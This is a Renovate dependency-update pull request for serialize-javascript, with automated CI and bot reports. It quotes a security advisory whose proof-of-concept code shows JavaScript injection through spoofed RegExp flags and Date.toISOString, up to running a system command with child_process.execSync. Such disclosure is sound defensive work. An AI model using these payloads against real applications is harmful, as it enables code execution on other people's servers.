chore(deps): update dependency serialize-javascript to v7 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
serialize-javascript	^6.0.2 → ^7.0.0

GitHub Vulnerability Alerts

GHSA-5c6j-r48x-rmvq

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@​placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!

#h2. PoC 2: Code Injection via Date.toISOString()

const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!

#h2. PoC 3: Remote Code Execution

const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@​rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3

---

Release Notes

yahoo/serialize-javascript (serialize-javascript)

v7.0.3

Compare Source

• fix(CVE-2020-7660): fix for RegExp.flags and Date.prototype.toISOString (#​207) 2e609d0
• build(deps-dev): bump lodash from 4.17.21 to 4.17.23 (#​206) 42b7cdb

---

v7.0.2

Compare Source

What's Changed

• ci: bump GitHub Actions to latest versions by @​okuryu in #​203
• ci: setup trusted publishing workflow by @​okuryu in #​204
• release: v7.0.2 by @​okuryu in #​205

Full Changelog: yahoo/serialize-javascript@v7.0.1...v7.0.2

v7.0.1

Compare Source

What's Changed

• Add warning about using this package to send arbitrary data to worker threads by @​valadaptive in #​200
• security: sanitize function bodies by @​redonkulus in #​199
• docs: tweak README by @​okuryu in #​201
• release: v7.0.1 by @​okuryu in #​202

New Contributors

• @​redonkulus made their first contribution in #​199

Full Changelog: yahoo/serialize-javascript@v7.0.0...v7.0.1

v7.0.0

Compare Source

Breaking Changes

• requires Node.js v20+

What's Changed

• Bump mocha from 10.2.0 to 10.4.0 by @​dependabot[bot] in #​178
• Bump mocha from 10.4.0 to 10.5.2 by @​dependabot[bot] in #​183
• Bump nyc from 15.1.0 to 17.0.0 by @​dependabot[bot] in #​184
• Bump braces from 3.0.2 to 3.0.3 by @​dependabot[bot] in #​181
• Bump mocha from 10.5.2 to 10.7.0 by @​dependabot[bot] in #​185
• Bump mocha from 10.7.0 to 10.7.3 by @​dependabot[bot] in #​186
• Bump nyc from 17.0.0 to 17.1.0 by @​dependabot[bot] in #​187
• Bump mocha from 10.7.3 to 10.8.2 by @​dependabot[bot] in #​188
• feat: test on Node.js 22 and built-in test runner by @​okuryu in #​192
• Generate UID without randombytes dependency by @​valadaptive in #​196
• release: v7.0.0 by @​okuryu in #​197

New Contributors

• @​valadaptive made their first contribution in #​196

Full Changelog: yahoo/serialize-javascript@v6.0.2...v7.0.0

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[changeset-bot]

⚠️ No Changeset found

Latest commit: bb29e64

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types

Click here to learn what changesets are, and how to add one.

Click here if you're a maintainer who wants to add a changeset to this PR

[ellipsis-dev]

Important

Looks good to me! 👍

Reviewed everything up to e1c899b in 8 seconds. Click for details.

• Reviewed 13 lines of code in 1 files
• Skipped 1 files when reviewing.
• Skipped posting 0 draft comments. View those below.
• Modify your settings and rules to customize what types of comments Ellipsis leaves. And don't forget to react with 👍 or 👎 to teach Ellipsis.

Workflow ID: wflow_XnDO2vXslntf5xOv

^{You can customize by changing your verbosity settings, reacting with 👍 or 👎, replying to comments, or adding code review rules.}

[codesandbox-ci]

This pull request is automatically built and testable in CodeSandbox.

To see build info of the built libraries, click here or the icon next to each commit SHA.

[socket-security]

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	serialize-javascript@​6.0.2 ⏵ 7.0.4	+1	+16		-2

View full report

[github-actions]

📊 Package size report   No changes

File	Before	After
Total (Includes all files)	3.4 MB	3.4 MB
Tarball size	1.2 MB	-0%↓1.2 MB

Unchanged files

File	Size
.changeset/config.json	313 B
.changeset/README.md	510 B
.codesandbox/ci.json	38 B
.editorconfig	161 B
.gitattributes	152 B
.github/workflows/autofix.yml	932 B
.github/workflows/ci.yml	1.6 kB
.github/workflows/pkg-pr-new.yml	695 B
.github/workflows/pkg-size.yml	609 B
.github/workflows/release.yml	1.3 kB
.github/workflows/size-limit.yml	802 B
.github/workflows/vercel.yml	1.1 kB
.nano-staged.js	48 B
.nvmrc	6 B
.postcssrc.cjs	51 B
.prettierignore	23 B
.prettierrc	24 B
.remarkrc	159 B
.renovaterc	49 B
.simple-git-hooks.js	49 B
.size-limit.json	290 B
.yarn/plugins/plugin-prepare-lifecycle.cjs	202 B
.yarn/releases/yarn-4.9.2.cjs	3.0 MB
.yarnrc.yml	397 B
assets/pkg.svg	15.1 kB
assets/sh.png	14.4 kB
CHANGELOG.md	393 B
docs/App.tsx	1.2 kB
docs/global.css	321 B
docs/index.tsx	211 B
eslint.config.js	503 B
index.html	414 B
LICENSE	1.1 kB
package.json	3.6 kB
packages/autocorrect/CHANGELOG.md	2.2 kB
packages/autocorrect/index.d.cts	63 B
packages/autocorrect/LICENSE	1.1 kB
packages/autocorrect/package.json	1.1 kB
packages/autocorrect/README.md	4.0 kB
packages/autocorrect/src/index.ts	1.4 kB
packages/autocorrect/src/types.ts	78 B
packages/autocorrect/test/__snapshots__/fixtures.spec.ts.snap	4.7 kB
packages/autocorrect/test/fixtures.spec.ts	961 B
packages/autocorrect/test/fixtures/test.css	189 B
packages/autocorrect/test/fixtures/test.go	470 B
packages/autocorrect/test/fixtures/test.html	1.1 kB
packages/autocorrect/test/fixtures/test.md	1.1 kB
packages/autocorrect/test/fixtures/test.py	368 B
packages/autocorrect/test/fixtures/test.rb	234 B
packages/autocorrect/test/fixtures/test0.js	453 B
packages/autocorrect/tsconfig.json	154 B
packages/pkg/CHANGELOG.md	13.6 kB
packages/pkg/index.d.cts	47 B
packages/pkg/LICENSE	16.7 kB
packages/pkg/package.json	1.0 kB
packages/pkg/README.md	7.2 kB
packages/pkg/src/index.ts	2.9 kB
packages/pkg/src/rules/files.ts	1.7 kB
packages/pkg/src/rules/object.ts	899 B
packages/pkg/src/rules/sort.ts	5.5 kB
packages/pkg/src/types.ts	1.1 kB
packages/pkg/src/utils.ts	596 B
packages/pkg/test/__snapshots__/engines.spec.ts.snap	158 B
packages/pkg/test/__snapshots__/files.spec.ts.snap	173 B
packages/pkg/test/__snapshots__/ignore-sort.spec.ts.snap	1.1 kB
packages/pkg/test/__snapshots__/sort-order-preset.spec.ts.snap	7.5 kB
packages/pkg/test/__snapshots__/sort-order.spec.ts.snap	964 B
packages/pkg/test/__snapshots__/test.spec.ts.snap	2.0 kB
packages/pkg/test/engines.spec.ts	417 B
packages/pkg/test/files.spec.ts	409 B
packages/pkg/test/fixtures/fixture1.json	1.0 kB
packages/pkg/test/fixtures/fixture2.json	863 B
packages/pkg/test/fixtures/fixture3.json	430 B
packages/pkg/test/ignore-sort.spec.ts	414 B
packages/pkg/test/sort-order-preset.spec.ts	708 B
packages/pkg/test/sort-order.spec.ts	442 B
packages/pkg/test/test.spec.ts	2.3 kB
packages/pkg/tsconfig.json	154 B
packages/sh/CHANGELOG.md	15.6 kB
packages/sh/index.d.cts	45 B
packages/sh/LICENSE	1.1 kB
packages/sh/package.json	1.4 kB
packages/sh/README.md	10.4 kB
packages/sh/src/index.ts	13.3 kB
packages/sh/test/__snapshots__/fixtures.spec.ts.snap	29.4 kB
packages/sh/test/__snapshots__/shellscript.spec.ts.snap	394 B
packages/sh/test/error.spec.ts	482 B
packages/sh/test/fixtures.spec.ts	1.4 kB
packages/sh/test/fixtures/.dockerignore	108 B
packages/sh/test/fixtures/.env.development	29 B
packages/sh/test/fixtures/.husky/precommit	17 B
packages/sh/test/fixtures/.nvmrc	6 B
packages/sh/test/fixtures/.properties	177 B
packages/sh/test/fixtures/133.sh	5.2 kB
packages/sh/test/fixtures/162.sh	15.7 kB
packages/sh/test/fixtures/182.sh	1.9 kB
packages/sh/test/fixtures/191.sh	1.7 kB
packages/sh/test/fixtures/278.Dockerfile	32 B
packages/sh/test/fixtures/292.Dockerfile	95 B
packages/sh/test/fixtures/376.Dockerfile	217 B
packages/sh/test/fixtures/384.Dockerfile	51 B
packages/sh/test/fixtures/398.Dockerfile	64 B
packages/sh/test/fixtures/441.Dockerfile	219 B
packages/sh/test/fixtures/445.Dockerfile	198 B
packages/sh/test/fixtures/445.sh	105 B
packages/sh/test/fixtures/Dockerfile	394 B
packages/sh/test/fixtures/hosts	406 B
packages/sh/test/fixtures/jvm.options	162 B
packages/sh/test/fixtures/no-ext	38 B
packages/sh/test/fixtures/shell.sh	368 B
packages/sh/test/loc-functions.spec.ts	1.2 kB
packages/sh/test/parser.spec.ts	2.1 kB
packages/sh/tsconfig.json	154 B
packages/sql/CHANGELOG.md	11.9 kB
packages/sql/index.d.cts	47 B
packages/sql/LICENSE	1.1 kB
packages/sql/package.json	1.3 kB
packages/sql/README.md	7.0 kB
packages/sql/src/index.ts	13.0 kB
packages/sql/test/__snapshots__/fixtures-eol.spec.ts.snap	886 B
packages/sql/test/__snapshots__/fixtures.spec.ts.snap	40.3 kB
packages/sql/test/__snapshots__/sql.spec.ts.snap	374 B
packages/sql/test/fixtures-eol.spec.ts	1.4 kB
packages/sql/test/fixtures-eol/556.sql	73 B
packages/sql/test/fixtures-eol/557.sql	69 B
packages/sql/test/fixtures-eol/558.sql	69 B
packages/sql/test/fixtures-eol/559.sql	73 B
packages/sql/test/fixtures.spec.ts	1.8 kB
packages/sql/test/fixtures/144.sql	68 B
packages/sql/test/fixtures/233.sql	68 B
packages/sql/test/fixtures/277.sql	88 B
packages/sql/test/fixtures/279.sql	106 B
packages/sql/test/fixtures/291.sql	1.2 kB
packages/sql/test/fixtures/334.sql	15 B
packages/sql/test/fixtures/405.sql	160 B
packages/sql/test/fixtures/basic.sql	120 B
packages/sql/test/sql.spec.ts	660 B
packages/sql/tsconfig.json	154 B
packages/toml/CHANGELOG.md	2.5 kB
packages/toml/index.d.cts	49 B
packages/toml/LICENSE	1.1 kB
packages/toml/package.json	1.1 kB
packages/toml/README.md	5.2 kB
packages/toml/src/index.ts	1.3 kB
packages/toml/src/options.ts	2.6 kB
packages/toml/src/types.ts	381 B
packages/toml/test/__snapshots__/fixtures.spec.ts.snap	493 B
packages/toml/test/fixtures.spec.ts	792 B
packages/toml/test/fixtures/comments.toml	87 B
packages/toml/test/fixtures/fixture1.toml	162 B
packages/toml/tsconfig.json	154 B
public/android-chrome-192x192.png	3.5 kB
public/android-chrome-512x512.png	12.6 kB
public/apple-touch-icon.png	3.5 kB
public/favicon-16x16.png	309 B
public/favicon-32x32.png	547 B
public/favicon.ico	15.4 kB
public/site.webmanifest	288 B
README.md	6.8 kB
scripts/format.ts	593 B
scripts/languages.ts	3.3 kB
test/global.d.ts	41 B
test/tsconfig.json	223 B
tsconfig.base.json	89 B
tsconfig.json	275 B
vercel.json	229 B
vite.config.ts	544 B
vitest.config.ts	541 B

_{🤖 This report was automatically generated by pkg-size-action}

[pkg-pr-new]

Open in StackBlitz

prettier-plugin-autocorrect

npm i https://pkg.pr.new/prettier-plugin-autocorrect@499

prettier-plugin-pkg

npm i https://pkg.pr.new/prettier-plugin-pkg@499

prettier-plugin-sh

npm i https://pkg.pr.new/prettier-plugin-sh@499

prettier-plugin-sql

npm i https://pkg.pr.new/prettier-plugin-sql@499

prettier-plugin-toml

npm i https://pkg.pr.new/prettier-plugin-toml@499

commit: 7de588d

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 86.69%. Comparing base (7a4346d) to head (bb29e64).

Additional details and impacted files

@@           Coverage Diff           @@
##           master     #499   +/-   ##
=======================================
  Coverage   86.69%   86.69%           
=======================================
  Files          10       10           
  Lines         203      203           
  Branches       57       57           
=======================================
  Hits          176      176           
  Misses         26       26           
  Partials        1        1           

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[github-actions]

size-limit report 📦

Path	Size
packages/autocorrect/lib/index.js	477 B (0%)
packages/pkg/lib/index.js	758 B (0%)
packages/sh/lib/index.js	2.68 KB (0%)
packages/sql/lib/index.js	2.04 KB (0%)

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud